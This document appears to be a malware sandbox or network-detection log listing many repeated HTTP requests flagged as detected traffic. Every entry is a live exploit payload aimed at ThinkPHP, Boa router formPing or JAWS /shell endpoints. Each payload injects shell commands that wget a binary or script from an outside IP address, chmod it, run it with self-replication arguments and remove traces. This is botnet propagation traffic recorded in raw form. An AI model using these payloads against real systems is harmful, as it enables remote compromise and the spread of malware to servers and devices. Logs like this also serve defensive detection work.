| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept:Data Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
